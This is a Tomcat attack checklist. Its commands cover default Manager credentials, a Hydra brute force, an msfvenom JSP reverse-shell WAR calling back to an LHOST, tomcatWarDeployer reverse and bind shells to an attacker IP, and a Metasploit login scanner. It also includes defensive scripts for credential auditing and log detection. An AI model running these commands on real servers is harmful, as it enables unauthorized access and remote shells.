Tomcat 8080

1. Check Default Directories

http://10.10.10.10:8080/manager
http://10.10.10.10:8080/manager.html

2. Check for Default Credentials

Some of the common usernames and passwords are:

  • Username List: admin, tomcat, manager, root

  • Password List: manager, password, root, tomcat, s3cret
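The defensive counterpart to this step, added here as an example that is not part of the original checklist: a small audit of a Tomcat `tomcat-users.xml` that flags any account whose plain-text password is on the default list above, and notes when such an account also holds a `manager-*` role (the roles the Manager application checks). The sample file is constructed for the example; the account names in it are not from the page. Digested passwords (Tomcat's `CredentialHandler`) are not compared, since the script only knows the plain-text defaults.

```python
"""Audit a tomcat-users.xml for the default credentials listed above.

Added example, not code from the original page. Uses only the standard library.
"""
import xml.etree.ElementTree as ET

# Default lists taken from the checklist above.
DEFAULT_USERS = {"admin", "tomcat", "manager", "root"}
DEFAULT_PASSWORDS = {"manager", "password", "root", "tomcat", "s3cret"}
# Roles the Manager application checks before granting access.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}

# Constructed sample file: two weak accounts and one with a non-default password.
SAMPLE_TOMCAT_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="admin" password="password" roles="manager-script,manager-gui"/>
  <user username="deploy-ci" password="Xk8vq2Lp9mZrT4wN" roles="manager-script"/>
</tomcat-users>
"""


def _local_name(tag):
    # tomcat-users.xml normally declares a default namespace, so tags arrive as
    # "{http://tomcat.apache.org/xml}user"; strip the namespace part.
    return tag.split("}")[-1]


def audit_tomcat_users(xml_text):
    """Return a list of (username, [reasons]) for accounts using default credentials."""
    root = ET.fromstring(xml_text)
    findings = []
    for node in root.iter():
        if _local_name(node.tag) != "user":
            continue
        name = node.get("username", "")
        password = node.get("password", "")  # empty if the file uses digested passwords
        roles = {r.strip() for r in node.get("roles", "").split(",") if r.strip()}
        reasons = []
        if name in DEFAULT_USERS and password in DEFAULT_PASSWORDS:
            reasons.append("default username/password pair")
        elif password in DEFAULT_PASSWORDS:
            reasons.append("default password")
        if reasons and roles & MANAGER_ROLES:
            reasons.append("holds manager role(s): " + ", ".join(sorted(roles & MANAGER_ROLES)))
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for user, reasons in audit_tomcat_users(SAMPLE_TOMCAT_USERS_XML):
        print(f"{user}: " + "; ".join(reasons))
```

Run it against a real file with `audit_tomcat_users(open("conf/tomcat-users.xml").read())`; any hit with a manager role is the account the brute-force and scanner steps further down would find first.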

3. Run Nikto Scan

nikto -h http://10.10.10.10:8080

4. Generate Reverse Shell Payload

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war

5. Brute Force with Hydra

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html

6. Using tomcatWarDeployer.py for Upload

The tomcatWarDeployer.py script can automate the process of uploading and deploying a reverse shell .war file to Tomcat. Clone the repository and use the script as follows:

sudo git clone https://github.com/mgeeky/tomcatWarDeployer.git
cd tomcatWarDeployer

To deploy a reverse shell:

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:8080/manager/html/

  • <username>: The username for authentication.

  • <password>: The password for authentication.

  • <ATTACKER_IP>: Your attacker's IP.

  • <ATTACKER_PORT>: The port you want the reverse shell to connect to.

  • <VICTIM_IP>: The target's IP address.

For a bind shell instead of a reverse shell:

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <VICTIM_IP>:8080/manager/html/

7. Metasploit Scanner for Tomcat

Metasploit has an auxiliary scanner that can quickly check the Tomcat Manager for default or weak login credentials:

use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 10.10.10.10
set USERNAME tomcat
set PASSWORD password
run
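Steps 5 to 7 all leave a recognisable trace in the Tomcat access log: a burst of 401 responses on `/manager/html` from one source, then a 200 with a populated `%u` (authenticated user) field, then a WAR deployment through the Manager. The following detection script is an added example from the defender's side, not part of the original checklist or of the tools it lists. It assumes the AccessLogValve `common` pattern (`%h %l %u %t "%r" %s %b`) and the Manager's HTML upload (`POST /manager/html/upload`) and text-interface deploy (`PUT /manager/text/deploy`) endpoints; the log lines, IPs and threshold are constructed for the example.

```python
"""Flag Manager brute-force, login-after-brute-force and WAR deployment in a Tomcat access log.

Added example (not from the original page). Standard library only.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Manager endpoints that result in a new application being deployed.
DEPLOY_ENDPOINTS = {("POST", "/manager/html/upload"), ("PUT", "/manager/text/deploy")}

# Constructed sample log: five failed logins in five seconds, a successful login,
# a WAR upload through the Manager UI, and one unrelated request from another host.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:30 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Oct/2023:13:55:31 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Oct/2023:13:55:32 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Oct/2023:13:55:33 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Oct/2023:13:55:34 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - tomcat [10/Oct/2023:13:55:40 +0000] "GET /manager/html HTTP/1.1" 200 19000
203.0.113.5 - tomcat [10/Oct/2023:13:55:52 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 200 20000
198.51.100.7 - - [10/Oct/2023:14:01:00 +0000] "GET /index.html HTTP/1.1" 200 1234
"""


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match the pattern."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    entry["status"] = int(entry["status"])
    entry["path"] = entry["path"].split("?", 1)[0]  # drop the query string (e.g. CSRF nonce)
    return entry


def analyze(log_text, window=timedelta(seconds=60), threshold=5):
    """Return a list of (source_ip, alert_kind, detail) tuples in log order."""
    alerts = []
    failures = defaultdict(list)  # ip -> timestamps of 401s on /manager within the window
    flagged = set()               # ips already reported for brute force
    login_reported = set()        # ips already reported for a login after brute force
    for line in log_text.splitlines():
        e = parse_line(line)
        if not e or not e["path"].startswith("/manager"):
            continue
        ip = e["ip"]
        if e["status"] == 401:
            # Sliding window of recent failures per source.
            failures[ip] = [t for t in failures[ip] if e["ts"] - t <= window] + [e["ts"]]
            if len(failures[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                secs = int(window.total_seconds())
                alerts.append((ip, "manager-bruteforce", f"{len(failures[ip])} 401s within {secs}s"))
        elif 200 <= e["status"] < 300:
            if (e["method"], e["path"]) in DEPLOY_ENDPOINTS:
                alerts.append((ip, "manager-war-deploy", f"{e['method']} {e['path']} as user {e['user']}"))
            elif ip in flagged and ip not in login_reported and e["path"] == "/manager/html":
                login_reported.add(ip)
                alerts.append((ip, "manager-login-after-bruteforce", f"authenticated as {e['user']}"))
    return alerts


if __name__ == "__main__":
    for ip, kind, detail in analyze(SAMPLE_LOG):
        print(f"{ip} {kind}: {detail}")
```

Point it at `logs/localhost_access_log.*.txt`; a `manager-war-deploy` alert from any address other than your deployment host is worth a look whether or not a brute-force burst preceded it.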
